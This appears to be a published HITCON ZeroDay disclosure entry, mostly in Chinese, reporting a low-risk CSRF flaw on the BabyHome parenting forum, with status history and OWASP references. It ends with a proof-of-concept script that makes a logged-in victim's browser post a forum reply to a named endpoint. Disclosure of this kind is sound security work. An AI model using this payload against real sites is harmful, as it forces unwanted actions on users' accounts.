Vulnerability Overview

ZDID: ZD-2020-01020
發信 Vendor: 競麗國際股份有限公司
Title: BabyHome CSRF
Introduction: CSRF 使有憑據之用戶在不意間自動留言

處理狀態

目前狀態

公開

Last Update : 2021/03/01

新提交
已審核
已通報
已修補
未複測
公開

處理歷程

2020/12/09 09:23:00 : 新提交 (由 pwn 更新此狀態)
2020/12/09 09:24:42 : 新提交 (由 pwn 更新此狀態)
2020/12/09 09:25:58 : 新提交 (由 pwn 更新此狀態)
2020/12/09 09:33:11 : 新提交 (由 pwn 更新此狀態)
2020/12/09 09:52:24 : 新提交 (由 pwn 更新此狀態)
2020/12/09 10:14:28 : 新提交 (由 pwn 更新此狀態)
2020/12/09 23:44:14 : 審核完成 (由 HITCON ZeroDay 服務團隊更新此狀態)
2020/12/10 17:43:25 : 修補中 (由 HITCON ZeroDay 服務團隊更新此狀態)
2020/12/10 17:43:25 : 修補中 (由 HITCON ZeroDay 服務團隊更新此狀態)
2021/01/28 16:00:27 : 複測申請中 (由組織帳號更新此狀態)
2021/03/01 03:00:02 : 公開 (由 HITCON ZeroDay 平台自動更新)

詳細資料

ZDID：ZD-2020-01020
通報者：jkwr (pwn)
風險：低
類型：跨站冒名請求 (Cross-Site Request Forgery, CSRF)

參考資料

攻擊者可經由該漏洞惡意操控使用者帳號進行惡意行為。

漏洞說明： OWASP - Cross-Site Request Forgery (CSRF)
https://www.owasp.org/index.php/Cross-Site_Request_Forgery_(CSRF)

防禦措施： OWASP - Cross-Site Request Forgery (CSRF) Prevention Cheat Sheet
https://www.owasp.org/index.php/Cross-Site_Request_Forgery_(CSRF)_Prevention_Cheat_Sheet

(本欄位資訊由系統根據漏洞類別自動產生，做為漏洞參考資料。)

敘述

僅僅測試，希望國內資安更牢靠

製作xhr

<script>var xhr=new XMLHttpRequest();xhr.open("POST","https://forum.babyhome.com.tw/reply/ajax_add_reply",true);xhr.setRequestHeader("Content-type", "application/x-www-form-urlencoded");xhr.withCredentials=true;xhr.send("subject_id=4914109&draft_type=reply&draft_id=h2BwzbuUkyxMNZGf&keyword_remind=N&quote_type=&quote_mmid=&mention_type=&mention_target_id=&reply_content=%3Cp%3EBabyHome%3C%2Fp%3E%0D%0A&agree=on");</script>